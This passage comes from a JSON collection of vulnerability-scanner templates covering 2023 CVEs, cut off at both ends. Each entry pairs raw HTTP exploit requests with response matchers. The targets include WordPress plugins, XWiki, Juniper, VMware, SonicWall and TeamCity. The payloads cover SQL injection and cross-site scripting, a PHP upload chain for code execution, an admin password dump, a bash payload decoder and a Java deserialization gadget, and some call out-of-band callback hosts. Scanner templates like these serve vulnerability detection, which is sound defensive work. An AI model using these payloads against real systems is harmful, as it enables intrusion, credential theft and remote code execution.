Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/ldap-authentication-report.csv"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID","USERNAME","TIME","LDAP STATUS"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-3077","info":{"name":"MStore API < 3.9.8 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/mstore-api/readme.txt"],"matchers":[{"type":"dsl","internal":true,"dsl":["status_code == 200","contains(body, \"MStore API\")"],"condition":"and"}]},{"raw":["@timeout: 15s\nGET /wp-json/api/flutter_booking/get_staffs?product_id=%27+or+ID=sleep(6)--+- HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-6786","info":{"name":"Payment Gateway for Telcell < 2.0.4 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-2948","info":{"name":"OpenEMR < 7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains_all(body, \"list_id: 1}});}}alert(document.domain);\", \"select at least one Provider\", \"Save</span>\")"],"condition":"and"}]}]},{"id":"CVE-2023-36844","info":{"name":"Juniper Devices - Remote Code Execution","severity":"medium"},"requests":[{"raw":["POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileData\": \"data:text/html;base64,{{base64(payload)}}\", \"fileName\": \"{{rand_base(5, \"abc\")}}.php\", \"csize\": {{len(payload)}}}]\n","POST /webauth_operation.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nrs=do_upload&rsargs[]=[{\"fileName\": \"{{rand_base(5, \"abc\")}}.ini\", \"fileData\": \"data:text/html;base64,{{base64(concat('auto_prepend_file=',hex_decode('22'),'/var/tmp/',phpfile,hex_decode('22')))}}\", \"csize\": \"97\" }]\n","GET /webauth_operation.php?PHPRC=/var/tmp/{{inifile}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["\"original_fileName\":","\"converted_fileName\":"],"condition":"and"},{"type":"word","part":"body_3","words":["{{md5(string)}}"]}],"extractors":[{"type":"regex","part":"body_1","name":"phpfile","regex":["([a-f0-9]{64}\\.php)"],"internal":true},{"type":"regex","part":"body_2","name":"inifile","regex":["([a-f0-9]{64}\\.ini)"],"internal":true}]}]},{"id":"CVE-2023-1496","info":{"name":"Imgproxy < 3.14.0 - Cross-site Scripting (XSS)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg"],"matchers":[{"type":"dsl","dsl":["contains(body, 'PC9zdmc+#test')","status_code == 200"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["content_security_policy"]}]}]},{"id":"CVE-2023-45136","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/xwiki/bin/create/Main/%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body, \"<script>alert(document.domain)</script>\", \"data-xwiki-reference\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-43795","info":{"name":"GeoServer WPS - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<wps:Execute version=\"1.0.0\" service=\"WPS\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n  xmlns=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:wfs=\"http://www.opengis.net/wfs\"\n  xmlns:wps=\"http://www.opengis.net/wps/1.0.0\"\n  xmlns:ows=\"http://www.opengis.net/ows/1.1\"\n  xmlns:gml=\"http://www.opengis.net/gml\"\n  xmlns:ogc=\"http://www.opengis.net/ogc\"\n  xmlns:wcs=\"http://www.opengis.net/wcs/1.1.1\"\n  xmlns:xlink=\"http://www.w3.org/1999/xlink\"\n        xsi:schemaLocation=\"http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd\">\n  <ows:Identifier>JTS:area</ows:Identifier>\n  <wps:DataInputs>\n    <wps:Input>\n      <ows:Identifier>geom</ows:Identifier>\n      <wps:Reference mimeType=\"application/json\" xlink:href=\"https://{{oast}}\" method=\"GET\">\n        <wps:Header key=\"{{string}}\" value=\"{{value}}\"/>\n      </wps:Reference>\n    </wps:Input>\n  </wps:DataInputs>\n  <wps:ResponseForm>\n    <wps:RawDataOutput>\n      <ows:Identifier>result</ows:Identifier>\n    </wps:RawDataOutput>\n  </wps:ResponseForm>\n</wps:Execute>\n"],"payloads":{"path":["/wms","/geoserver/wms"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(interactsh_protocol, 'http')","contains_all(to_lower(interactsh_request), '{{string}}','{{value}}')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-0630","info":{"name":"Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains(content_type_2, \"application/json\")","contains(body_2, \"audioShortcodeLibrary\")"],"condition":"and"}]}]},{"id":"CVE-2023-37979","info":{"name":"Ninja Forms < 3.6.26 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=nf_batch_process&batch_type=import_form_template&extraData%5Btemplate%5D=formtemplate-contactformd&method_override=_respond&data=Mehran%7D%7D%3Cimg+src%3Donerror%3Dalert%28document.domain%29%3E\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=onerror=alert(document.domain)>\") && contains(body_2, \"import_form_template\")","status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27179","info":{"name":"GDidees CMS v3.9.1 - Arbitrary File Download","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_admin/imgdownload.php?filename=imgdownload.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["$filename=$_GET[\"filename\"];","@readfile($filename) OR die();"],"condition":"and"},{"type":"word","part":"header","words":["application/force-download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-22480","info":{"name":"KubeOperator Foreground `kubeconfig` - File Download","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["apiVersion:","clusters:"],"condition":"and"},{"type":"word","part":"header","words":["application/download"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2982","info":{"name":"Miniorange Social Login and Register <= 7.6.3 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption=moopenid&email=uzmpvjPBmwEO3tFXq0vlJg%3D%3D&appName=rlHeqZw2vrPzOiWWfCParA%3D%3D\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"set_cookie","words":["wordpress_sec_","wordpress_logged_in_"],"condition":"or"},{"type":"status","status":[302]}]}]},{"id":"CVE-2023-34756","info":{"name":"Bloofox v0.5.2.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /admin/index.php HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&action=login\n","@timeout: 10s\nPOST /admin/index.php?mode=settings&page=charset&action=edit HTTP/2\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nname=ISO-8859-1&description=&cid=2'+AND+(SELECT+7401+FROM+(SELECT(SLEEP(6)))hwrS)--+&send=Save\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body_2, 'Admincenter')"],"condition":"and"}]}]},{"id":"CVE-2023-44393","info":{"name":"Piwigo - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /identification.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&login=\n","GET /admin.php?page=plugins&tab=new&installstatus=ok&plugin_id=nfez2%22%3E%3Cscript%3Eprompt(document.domain)%3C%2fscript%3Ehkugi HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<script>prompt(document.domain)</script>","The plugin has been successfully copied"],"condition":"and"},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-47684","info":{"name":"Essential Grid <= 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action=Essential_Grid_Front_request_ajax&client_action=load_post_content&postid=1&settings={%22lbMax%22:%22\\%22%3E%3Cscript%3Ealert(document.domain);%3C/script%3E%22} HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","lightbox"],"condition":"and"},{"type":"word","part":"content_type","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-24367","info":{"name":"Temenos T24 R20 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jsps/genrequest.jsp?routineName=\"><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","<title>Processing...</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-49785","info":{"name":"ChatGPT-Next-Web - SSRF/XSS","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23","{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"],"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["contains(body_1, \"<script>alert(document.domain)</script>\")","contains(header_1, \"text/html\")"],"condition":"and"},{"type":"dsl","dsl":["contains(header_2,'X-Interactsh-Version')","contains(interactsh_protocol_2,'dns')"],"condition":"and"}]}]},{"id":"CVE-2023-0448","info":{"name":"WP Helper Lite < 4.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"><svg onload=alert(document.domain)>\")","contains(body, \"params\\\":{\\\"action\")"],"condition":"and"}]}]},{"id":"CVE-2023-40355","info":{"name":"Axigen WebMail - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//","{{BaseURL}}/index.hsp?m=',alert(document.domain),'"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\\\\'-alert(document.domain),//","',alert(document.domain),'"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/html\")","contains(response, \"Axigen\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-27159","info":{"name":"Appwrite <=1.2.1 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/v1/avatars/favicon?url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: Appwrite-Server"]}]}]},{"id":"CVE-2023-48084","info":{"name":"Nagios XI < 5.11.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&page=auth&debug=&pageopt=login&username={{username}}&password={{password}}&loginButton=\n","@timeout: 15s\nGET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration_3>=5","contains(body_3, \"Home Dashboard</a>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nsp","part":"body","group":1,"regex":["name=\"nsp\" value=\"(.*)\">"],"internal":true}]}]},{"id":"CVE-2023-23161","info":{"name":"Art Gallery Management System Project v1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/product.php?cid=1&&artname=%3Cimg%20src=1%20onerror=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["center\"><img src=1 onerror=alert(document.domain)>","Art Type"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-39002","info":{"name":"OPNsense - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{{para}}={{value}}&usernamefld={{username}}&passwordfld={{password}}&login=1\n","GET /system_certmanager.php?act=%22%3E%3Csvg/onload=alert(document.domain)%3E&id=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["value=\"\"><svg/onload=alert(window.origin)> \"/>"]},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"para","part":"body","group":1,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true},{"type":"regex","name":"value","part":"body","group":2,"regex":["type=\"hidden\" name=\"([a-zA-Z0-9]+)\" value=\"([A-Z0-9a-z]+)\" autocomplete=\""],"internal":true}]}]},{"id":"CVE-2023-20887","info":{"name":"VMware VRealize Network Insight - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /saas./resttosaasservlet HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-thrift\n\n[1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"rec\":"]},{"type":"word","part":"header","words":["application/x-thrift"]},{"type":"word","part":"body","negative":true,"words":["Provided invalid node Id","Invalid nodeId"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-34124","info":{"name":"SonicWall GMS and Analytics Web Services - Shell Injection","severity":"critical"},"requests":[{"raw":["GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1\nHost: {{Hostname}}\nAuth: {\"user\": \"system\", \"hash\": \"{{base64(hex_decode(auth))}}\"}\n","GET /appliance/login HTTP/1.1\nHost: {{Hostname}}\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=login&skipSessionCheck=0&needPwdChange=0&clientHash={{ md5(concat(servertoken,replace_regex(alias,\"^.*:\",\"\"))) }}&password={{replace_regex(alias,\"^.*:\",\"\")}}&applianceUser={{replace_regex(alias,\":.*$\",\"\")}}&appliancePassword=Nice%20Try&ctlTimezoneOffset=0\n","POST /appliance/applianceMainPage HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnum=3232150&action=file_system&task=search&item=application_log&criteria=*&width=500&searchFolder=%2Fopt%2FGMSVP%2Fetc%2F&searchFilter=appliance.jar%3Bbash+-c+PLUS%3d\\$\\(echo\\+-e\\+begin-base64\\+755\\+a\\\\\\\\nKwee\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+\\|\\+uudecode\\+-o-\\)\\%3becho\\+-e\\+begin-base64\\+755\\+/tmp/.{{filename}}\\\\\\\\n{{replace(base64(callback),\"+\",\"${PLUS}\")}}\\\\\\\\n\\%3d\\%3d\\%3d\\%3d\\+|+uudecode+%3b/tmp/.{{filename}}%3brm+/tmp/.{{filename}}%3becho+\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["<title>SonicWall Universal Management Appliance</title>","<title>SonicWall Universal Management Host</title>"],"condition":"or"},{"type":"word","part":"interactsh_protocol","words":["dns"]}],"extractors":[{"type":"json","part":"body","internal":true,"name":"alias","group":1,"json":[".alias"]},{"type":"regex","part":"body","internal":true,"name":"servertoken","group":1,"regex":["getPwdHash.*,'([0-9]+)'"]}]}]},{"id":"CVE-2023-32068","info":{"name":"XWiki - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/login/XWiki/XWikiLogin?xredirect=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2023-6065","info":{"name":"Quttera Web Malware Scanner <= 3.4.1.48 - Sensitive Data Exposure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/quttera-web-malware-scanner/quttera_wp_report.txt"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Website Malware Scan Report","Scanned Website","Scan type"],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-27922","info":{"name":"Newsletter < 7.6.9 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=newsletter_system_status&a%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"text/html\")","contains(tolower(body_2), \"_newsletter_\")","contains(body_2, \"><script>alert(document_domain)</script>\")"],"condition":"and"}]}]},{"id":"CVE-2023-0552","info":{"name":"WordPress Pie Register <3.8.2.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me"],"redirects":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2023-44012","info":{"name":"mojoPortal v.2.7.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Help.aspx?helpkey=xxxxxxx'><svg/onload=alert()+x="],"matchers":[{"type":"dsl","dsl":["contains_any(body, \"mojoPortal\", \"mojo-accordion\", \"mojo-tabs\")","contains(body, \"><svg/onload=alert()\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-1546","info":{"name":"MyCryptoCheckout < 2.124 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"><script>alert(/XSS/)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"scriptalert(/XSS/)/script\")","contains(body_2, \"mycryptocheckout\")"],"condition":"and"}]}]},{"id":"CVE-2023-27482","info":{"name":"Home Assistant Supervisor - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /api/hassio/app/.%252e/supervisor/info HTTP/1.1\nHost: {{Hostname}}\n","GET /api/hassio/app/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 1\nHost: {{Hostname}}\n","GET /api/hassio_ingress/.%09./supervisor/info HTTP/1.1 # Mitigation bypass 2\nHost: {{Hostname}}\nX-Hass-Is-Admin:1\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["\"slug\":","\"name\":","\"ip_address\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-38205","info":{"name":"Adobe ColdFusion - Access Control Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax/..CFIDE/wizards/common/utils.cfc?method=wizardHash&inPassword=foo&_cfclient=true&returnFormat=wddx"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["([0-9a-fA-F]{32},){2}[0-9a-fA-F]{32}"]},{"type":"dsl","dsl":["contains(content_type, \"text/html\")","status_code == 200","len(trim_space(body)) == 106"],"condition":"and"}]}]},{"id":"CVE-2023-46732","info":{"name":"XWiki < 14.10.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e","{{BaseURL}}/xwiki/bin/view/Main/?rev=xar%3Aorg.xwiki.platform%3Axwiki-platform-distribution-flavor-common%2F15.5%25%25%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains(body, \"<script>alert(document.domain)</script>\\\" id=\\\"tmViewSource\")","contains(header, \"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-39676","info":{"name":"PrestaShop fieldpopupnewsletter Module - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/modules/fieldpopupnewsletter/ajax.php?callback=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Invalid email"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-2309","info":{"name":"wpForo Forum <= 2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /community/main-forum/?param=%3Cscript%3Ealert(/document.domain/)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"<script>alert(/document.domain/)</script>\",\"wpforo\")","contains(header,\"text/html\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2023-50720","info":{"name":"XWiki < 4.10.15 - Email Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*","{{BaseURL}}/xwiki/bin/view/Main/Search?sort=score&sortOrder=desc&highlight=true&facet=true&r=1&f_locale=en&f_locale=&text=objcontent%3Aemail*"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["email</span> :","XWiki.XWikiUsers[0]","email_checked</span>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-42793","info":{"name":"JetBrains TeamCity < 2023.05.4 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["DELETE /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: {{Hostname}}\n","POST /admin/dataDir.html?action=edit&fileName=config%2Finternal.properties&content=rest.debug.processes.enable=true HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /admin/admin.html?item=diagnostics&tab=dataDir&file=config/internal.properties HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\nContent-Type: application/x-www-form-urlencoded\n","POST /app/rest/debug/processes?exePath=echo&params={{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Bearer {{token}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["<token name=\"RPC2\" creationTime"]},{"type":"word","part":"body_5","words":["StdOut:{{randstr}}"]}],"extractors":[{"type":"regex","part":"body_2","name":"token","group":1,"regex":["value=\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2023-50290","info":{"name":"Apache Solr - Host Environment Variables Leak via Metrics API","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/solr/admin/metrics"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"responseHeader\":","\"solr.jetty\":","system.env"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-23333","info":{"name":"SolarView Compact 6.00 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 25s\nGET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","part":"body","regex":["33332-3202-EVC"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2023-43323","info":{"name":"mooSocial 3.1.8 - External Service Interaction","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["mooConfig"],"internal":true}]},{"raw":["POST /activities/ajax_share HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n[data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1]\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"]}]}]},{"id":"CVE-2023-36284","info":{"name":"QloApps 1.6.0 - SQL Injection","severity":"high"},"requests":[{"raw":["GET / HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","internal":true,"words":["QloApps"],"case-insensitive":true}]},{"raw":["@timeout: 20s\nGET /quick-order?date_from=2023-06-12%2000:00:00&date_to=2023-06-13%2000:00:00&deleteFromOrderLine=1&id_product=(select(0)from(select(sleep(5)))v) HTTP/2\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"<span>Guest Information\")"],"condition":"and"}]}]},{"id":"CVE-2023-20864","info":{"name":"VMware Aria Operations for Logs - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /csrf HTTP/1.1\nHost: {{Hostname}}\nX-Csrf-Token: Fetch\n","POST /api/v2/internal/cluster/applyMembership HTTP/1.1\nHost: {{Hostname}}\nX-CSRF-Token: {{xcsrftoken}}\nContent-type: application/octet-stream\n\n{{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["\"errorMessage\":\"Internal 